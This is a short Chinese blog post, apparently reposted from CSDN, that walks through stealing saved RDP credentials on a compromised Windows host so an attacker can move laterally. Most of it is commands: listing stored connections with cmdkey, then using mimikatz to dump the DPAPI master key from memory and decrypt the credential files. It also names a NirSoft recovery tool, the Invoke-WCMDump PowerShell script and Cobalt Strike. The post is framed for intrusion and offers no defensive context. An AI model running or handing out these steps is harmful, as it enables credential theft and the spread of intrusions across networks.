其他分享
首页 > 其他分享> > RDP凭据获取继续横向

RDP凭据获取继续横向

作者:互联网

RDP凭据获取继续横向

文章目录

猕猴桃获取密码

有可能这台机器保存登录其他机器rdp

#查看mstsc的连接纪录
cmdkey /list 

#查找本地的Credentials:
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

在这里插入图片描述

如果存在,可以使用mimikatz

记录这个值

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\9D26EE720EDC4D95AF94298895D92FA9"

在这里插入图片描述

执行找到guidMasterKey值对应的guid下的MasterKer值

mimikatz.exe "privilege::debug" "sekurlsa::dpapi" >1.txt

在这里插入图片描述

mimikatz.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\9D26EE720EDC4D95AF94298895D92FA9 /masterkey:9d112cafdfc47142e80b38fecc3c9738ff844db85ce15e2e035f21c7727a76334c725a16942df1769a0ece1e68c7aeb6a484a877d538494201029be8d7914213"

在这里插入图片描述

破解密码,登录机器

network password

下载地址:https://www.nirsoft.net/utils/network_password_recovery.html

在这里插入图片描述

通过powershell脚本

下载地址:https://github.com/peewpw/Invoke-WCMDump

Import-Module .\Invoke-WCMDump.ps1
Invoke-WCMDump

也可以直接cs使用

标签:dpapi,RDP,AppData,凭据,横向,mimikatz,Credentials,Local,network
来源: https://blog.csdn.net/weixin_43227251/article/details/116455619